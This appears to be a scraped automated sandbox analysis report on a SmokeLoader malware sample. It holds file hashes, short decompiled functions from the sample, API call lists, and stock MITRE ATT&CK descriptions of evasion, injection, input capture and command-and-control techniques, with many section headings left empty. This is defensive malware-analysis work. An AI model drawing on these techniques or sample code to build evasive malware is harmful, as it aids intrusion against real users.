Opcode Fuzzy Hash: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
Instruction Fuzzy Hash: 15E0C26910150E6E865C8A7195440D2B7D6FFC2240BA12D49C3062BC22893AB883D591

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: eveggtb PID: 4720 Parent PID: 7080 eveggtbCOMMON

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 0000000B.00000002.781009664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 0000000B.00000002.781009664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96nativeCOMMON

Download Yara Rule

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 0000000B.00000002.781009664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report UZ6FEqlix4

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

Function 0041CA09, Relevance: 205.2, APIs: 89, Strings: 28, Instructions: 483
timefilestringCOMMON

Function 0041ABC0, Relevance: 65.5, APIs: 3, Strings: 34, Instructions: 785
librarymemoryloaderCOMMON

Function 0041BAA1, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 391
librarymemoryloaderCOMMON

Function 00428A80, Relevance: 10.8, APIs: 7, Instructions: 255
COMMON

Function 00423DB0, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Function 0041C7CC, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 0041C7DF, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 118
memorypipeCOMMON

Function 0041AA72, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110
timefilesynchronizationCOMMON

Function 00424E60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
COMMON

Function 0042C6D0, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 00422EB0, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 126
COMMON

Function 0041DA75, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 55
COMMON

Function 00426450, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 53
COMMON

Function 0041C9AC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 26
filesleepCOMMON

Function 0041D7C8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Function 0041D34A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44
COMMON

Function 0041D518, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
COMMON

Function 0041D8AF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 0041D9CF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
COMMON

Function 0041DA22, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
COMMON

Function 0041F4D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
memoryCOMMON

Function 00424C10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Function 0041D42E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Function 0043DA50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Function 0043DA70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Function 0043DA10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Function 0043DA30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre